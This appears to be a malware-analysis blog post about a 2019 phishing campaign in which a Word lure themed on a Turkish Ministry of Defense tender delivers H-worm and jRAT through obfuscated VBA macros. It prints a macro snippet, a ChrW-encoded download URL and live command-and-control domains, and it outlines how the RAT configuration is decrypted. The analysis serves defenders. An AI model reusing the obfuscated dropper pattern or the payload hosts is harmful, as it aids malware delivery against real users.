In the late evening of 08-01-2019 a phishing document related to the Ministry of Defense of Turkey has been captured in the wild and caught my attention (md5: 0d3b1c3c4287fe12399dc29d88905e9c).
Further investigations led to believe that a new malicious campaign aimed to the spreading of HWorm + jRat variants is raising up in these last days.
The phishing document (md5: 0d3b1c3c4287fe12399dc29d88905e9c) tries to attract the curiosity of the potential victims through a file name that leaves you thinking at some tender detail of Turkey Ministry of Defense. One of the file name related to the threat in question is in fact
“RFQ-Ministry of Defence Turkey Tender details 2019.doc”.
This document is armed with obfuscated macro code designed to download and execute a remote content from the URL
Following a frame about the first stage malicious macro code:
If 9 = 8 Then
Dim zxswpcjjodbpcfibtpczpeavykqflynmws As String
zxswpcjjodbpcfibtpczpeavykqflynmws = "vmkNRssI"
Dim oinzxs As String
oinzxs = "ZgTrxfqw"
Dim umclwjgpdqfjkp As String
umclwjgpdqfjkp = "."
Application.Run zxswpcjjodbpcfibtpczpeavykqflynmws & umclwjgpdqfjkp & oinzxs
This first piece of code is designed to call the module name ‘vmkNRssI’ that is responsible to make an outgoing request in order to retrieve the second stage payload.
The 1st level CnC is encoded with the corrisponding wide characters of the URL
h t t p s : / / d j l e s m s . c o m / j e n q t g I y H B _ n e w a s o . v b s
Following as they appeared originally:
ChrW(104.4) & ChrW(116.2) & ChrW(116.1) & ChrW(112.2) & ChrW(115.1) & ChrW(58.4) & ChrW(47.3) & ChrW(47.1) & ChrW(100.3) & ChrW(106.1) & ChrW(108.4) & ChrW(101.3) & ChrW(111.1) & ChrW(109.4) & ChrW(115.4) & ChrW(46.1) & ChrW(99.4) & ChrW(111.2) & ChrW(109.3) & ChrW(47.3) & ChrW(106.4) & ChrW(101.2) & ChrW(110.3) & ChrW(113.1) & ChrW(116.2) & ChrW(103.4) & ChrW(73.3) & ChrW(121.3) & ChrW(72.2) & ChrW(66.3) & ChrW(95.3) & ChrW(110.1) & ChrW(101.1) & ChrW(119.3) & ChrW(97.2) & ChrW(115.4) & ChrW(111.2) & ChrW(46.3) & ChrW(118.4) & ChrW(98.2) & ChrW(115.1)
Once the download is executed, a new file named beo.vbs is created under %temp% and then launched.
The content of the beo.vbs file is retrieved previoulsy from djleoms.com.
A second stage operation is so performed through this script for which a screenshot is shown below:
This second stage code includes two different malicious payloads. The first one is included into the variable “longText1” and the second is included into the variable “longText“. According to the operating logic observed, this code was designed to carry out the execution of two different malicious components, represented with the following graphic:
The longText1 base64 encoded content is first decoded and then written under %appdata%. It’s named UwwogLCzsN.vbs. This piece of code is nothing more than a H-worm VBS variant.
The payload is simply a VBS file with a clear config section pointing to pm2bitcoin.com and goz.unknowncypter.com.
Upon successfull compromize, it sends various sensitive information to the CnC servers repoterd above. Persistency achieved through reg keys
After acquiring and sending frames of information about the victim machine, it joins an infinite loop in order to wait further commands to execute:
The dropped jRAT variant is an heavly obfuscated jar executable [md5: CDEE1E867980580A55BC34BC240FB12B]. jRAT is java developed cross-platform remote access tool that make use of obfuscation and encryption (RSA+AES) in order to make static analysis and detection more complex.
It’s able to perform many malicious activity and drop further malicious components through the which to execute and lauch commands in order to perform system recoinnassance and data exfiltration. Extracting the jar file, i m able to see common files related to Adwind /jRat samples:
The interesting thing here is the serialized object within sky.drive. Nothing more to do, but we can clearly see,as expected, some references to a RSA Key confirming the presence of some encrypted content.
If we look at META-INF/MANIFEST.MF we can get reference to the main class witch is, as expected, operational.JRat.
After decompiling it, we get the following main method:
No much time to spent as the core logic is the same of older jRat samples. Following that logic, basically what it’s going to do here is to retrieve a first key within sky.drive in order to use that key to decrypt the AES key in drop.box. Finally, it uses this AES key to decrypt the content of mega.download, which is the configuration file containing the RAT server path, the RSA and AES key.
Simple enough to guess, making a decryptor in order to chain these basic operations is not too hard. Luckily for all us, there is someone that already thinked to this: https://github.com/mhelwig/adwind-decryptor.
In this specific case the following are the 1st group of configuration parameters of the sample retrieved:
Using these parameters is quite simple to recover the main server RAT archive.
The file config.json is the main configuration file serving RAT operations. File Key1.json is a serialized KeyRep object and Key2.json is the AES key. Applying the same previous principles, we can decrypt config.json and get the following:
In the NICKNAME entry, the string “NEW YEAR 2019” came out, suggesting the recent birth of the campaing in question.
It achieves persistency through the adding of the REG_KEY
and is able to perform reconnaissance and malicious actions (like a search for security products installed) via WMI. It drops and executes different .vbs files under %TEMP% and fills them through the following function
The RAT is highly efficient and configurable through the use of JSON files and it has the the possibility of extending its functions by further downloading specific modules. For the main server module, it works making use of encrypted strings resolved in runtime through functions like the following:
Do we light it ?
Considering the domain creation date and the history of djleoms.com, may be this is a website serving accidentally this cyber operation or may be it’s under the control of the threat actor for a very long time. According to a waybackmachine research, this website is showing nearly the same content in the last few years.
Following a statistical image about:
Anyway, at the time of analysis , it is still serving this malicious campaign.
The following are the countries were i can observe activities of jRAT samples with an high similarity rate:
Pivoting further through the research of jRAT samples spreading in these days with a little smaller similary rate, the map extends to other countries:
jRat + Houdini is not a new combo to write on. More or less a similar campaign was observed in mid-2018. Likely, in this case, the threat actor is from middle-est. Someone told me that the name of the phishing document is rather strange.
Indicators of compromise